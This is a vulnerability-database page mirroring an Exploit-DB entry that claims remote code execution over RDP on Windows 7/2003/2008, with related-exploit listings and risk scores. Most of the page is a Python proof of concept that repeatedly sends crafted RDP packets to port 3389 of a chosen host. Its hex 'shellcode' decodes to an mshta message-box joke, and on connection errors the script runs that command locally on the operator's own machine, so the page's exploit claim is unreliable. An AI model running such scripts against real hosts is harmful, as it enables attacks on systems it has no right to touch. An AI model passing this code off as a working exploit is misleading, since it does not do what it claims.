Microsoft Windows 7/2003/2008 RDP - Remote Code Execution

🗓️ 22 May 2019 00:00:00Reported by Exploit-DBType

exploitdb🔗 www.exploit-db.com👁 1368 Views

Microsoft Windows 7/2003/2008 RDP - Remote Code Executio

Reporter	Title	Published	Views	Family All 291
GithubExploit	Exploit for Use After Free in Microsoft	15 May 201919:53	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	23 May 201907:47	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	21 May 201906:57	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	12 Jun 201903:37	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	19 May 201923:32	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	23 May 201918:37	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	7 Sep 201908:35	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	19 Jun 202121:55	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	27 May 201912:52	–	githubexploit
GithubExploit	Exploit for Use After Free in Microsoft	23 Jul 201903:15	–	githubexploit

#RDP Blue POC by k8gege
#Local:  Win7  (python)
#Target: Win2003 & Win2008 (open 3389)

import socket
import sys
import os
import platform

buf=""
buf+="\x03\x00\x00\x13" # TPKT, Version 3, lenght 19
buf+="\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00" # ITU-T Rec X.224
buf+="\x03\x00\x01\xd6" # TPKT, Version 3, lenght 470
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x7f\x65\x82\x01\x94\x04" #SERVICE T.125

buf+="\x01\x01\x04\x01\x01\x01\x01\xff" 
buf+="\x30\x19\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x02\x02\x04"
buf+="\x00\x00\x00\x00\x02\x04\x00\x00"#COMMUNICATION
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\xff\xff\x02\x04\x00\x00\x00\x02"
buf+="\x30\x19\x02\x04\x00\x00\x00\x01"# TPKT, Version 5, Lenght 12
buf+="\x02\x04\x00\x00\x00\x01\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x01\x02\x04\x00\x00\x00\x00"
buf+="\x02\x04\x00\x00\x00\x01\x02\x02"
buf+="\x04\x20\x02\x04\x00\x00\x00\x02"#MULTIPOINT
buf+="\x30\x1c\x02\x02\xff\xff\x02\x02"
buf+="\xfc\x17\x02\x02\xff\xff\x02\x04"
buf+="\x00\x00\x00\x01\x02\x04\x00\x00"
buf+="\x00\x00\x02\x04\x00\x00\x00\x01"
buf+="\x02\x02\xff\xff\x02\x04\x00\x00"
buf+="\x00\x02\x04\x82\x01\x33\x00\x05"
buf+="\x00\x14\x7c\x00\x01\x81\x2a\x00"#message
buf+="\x08\x00\x10\x00\x01\xc0\x00\x44"
buf+="\x75\x63\x61\x81\x1c\x01\xc0\xd8"
buf+="\x00\x04\x00\x08\x00\x80\x02\xe0"
buf+="\x01\x01\xca\x03\xaa\x09\x04\x00"
buf+="\x00\xce\x0e\x00\x00\x48\x00\x4f"# TPKT, Version 3, Lenght 12
buf+="\x00\x53\x00\x54\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\x00\x00"
buf+="\x00\x00\x00\x00\x00\x0c\x00\x00"# TPKT, Version 8, Lenght 12
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#nop
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x01\xca\x01\x00\x00\x00\x00"
buf+="\x00\x10\x00\x07\x00\x01\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"#ITU-T Rec X.224
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x30\x00\x30"
buf+="\x00\x2d\x00\x30\x00\x30\x00\x30"
buf+="\x00\x30\x00\x30\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"#ITU-T Rec X.224
buf+="\x00\x00\x00\x00\x00\x00\x00\x00"
buf+="\x00\x00\x00\x00\x00\x04\xc0\x0c"
buf+="\x00\x0d\x00\x00\x00\x00\x00\x00"
buf+="\x00\x02\xc0\x0c\x00\x1b\x00\x00"
buf+="\x00\x00\x00\x00\x00\x03\xc0\x2c"#ITU-T Rec X.224
buf+="\x00\x03\x00\x00\x00\x72\x64\x70"
buf+="\x64\x72\x00\x00\x00\x00\x00\x80"
buf+="\x80\x63\x6c\x69\x70\x72\x64\x72"
buf+="\x00\x00\x00\xa0\xc0\x72\x64\x70"
buf+="\x73\x6e\x64\x00\x00\x00\x00\x00"
buf+="\xc0"

buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80"  # ITU-T Rec X.224
buf+="\x04\x01\x00\x01\x00" # MULTIPOINT-COMMUNICATION-SERVICE T.125
buf+="\x03\x00\x00\x08" #TPKT, Version 3, Length 8
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x28" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" # ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xef" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xeb" # MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xec"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c"  # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xed"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0c" # TPKT, Version 3, Lenght 12
buf+="\x02\xf0\x80" #ITU-T Rec X.224
buf+="\x38\x00\x06\x03\xee"# MULTIPOINT-COMM-SERVICE T.125
buf+="\x03\x00\x00\x0b" # TPKT, Version 3, Lenght 12
buf+="\x06\xd0\x00\x00\x12\x34\x00"  #ITU-T Rec X.224
buf2="\x23\x79\x6F\x75\x20\x70\x6C\x61\x79\x20"
buf2+="\x62\x61\x73\x6B\x65\x74\x62\x61\x6C\x6C"
buf2+="\x20\x6C\x69\x6B\x65\x20\x63\x61\x69\x78"
buf2+="\x75\x6B\x75\x6E\x23";
sc="\x6D\x73\x68\x74\x61\x20\x76\x62\x73\x63" #shellcode
sc+="\x72\x69\x70\x74\x3A\x6D\x73\x67\x62\x6F"
sc+="\x78\x28\x22\x79\x6F\x75\x20\x70\x6C\x61"
sc+="\x79\x20\x62\x61\x73\x6B\x65\x74\x62\x61"
sc+="\x6C\x6C\x20\x6C\x69\x6B\x65\x20\x63\x61"
sc+="\x69\x78\x75\x6B\x75\x6E\x21\x22\x2C\x36"
sc+="\x34\x2C\x22\x4B\x38\x67\x65\x67\x65\x3A"
sc+="\x22\x29\x28\x77\x69\x6E\x64\x6F\x77\x2E"
sc+="\x63\x6C\x6F\x73\x65\x29";

HOST = sys.argv[1]
PORT = 3389
print "Win2003 & Win2008 RDP POC"
print "Target: "+HOST
recexec=buf
for i in range(8):
	try:
		 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		 s.connect((HOST,PORT))
		 print "sending: %d bytes" % len(buf)
		 s.send(buf)
		 rec = s.recv(100)
		 recexec=sc
		 print "received: %d bytes" % len(rec)
		 s.close()
		 print ""
	except:
		if(platform.system()=="Windows"):
			os.system(recexec)

22 May 2019 00:00Current

10High risk

Vulners AI Score10

CVSS 3.19.8

CVSS 210

EPSS0.94454